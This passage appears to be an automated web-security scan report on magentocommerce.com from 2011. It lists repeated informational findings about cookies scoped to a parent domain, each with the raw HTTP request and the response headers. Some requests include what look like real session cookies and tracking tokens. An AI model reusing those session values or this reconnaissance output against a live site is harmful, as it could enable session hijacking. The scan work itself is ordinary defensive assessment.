Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.45. http://www.magentocommerce.com/he  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.46. http://www.magentocommerce.com/hu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.47. http://www.magentocommerce.com/imagine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.48. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.49. http://www.magentocommerce.com/jobs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.50. http://www.magentocommerce.com/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.51. http://www.magentocommerce.com/jobs/p/2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.52. http://www.magentocommerce.com/knowledge-base  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.53. http://www.magentocommerce.com/license/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.54. http://www.magentocommerce.com/license/enterprise-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.55. http://www.magentocommerce.com/lodger-footwear/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.56. http://www.magentocommerce.com/lt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.57. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.58. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.59. http://www.magentocommerce.com/media/interviews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
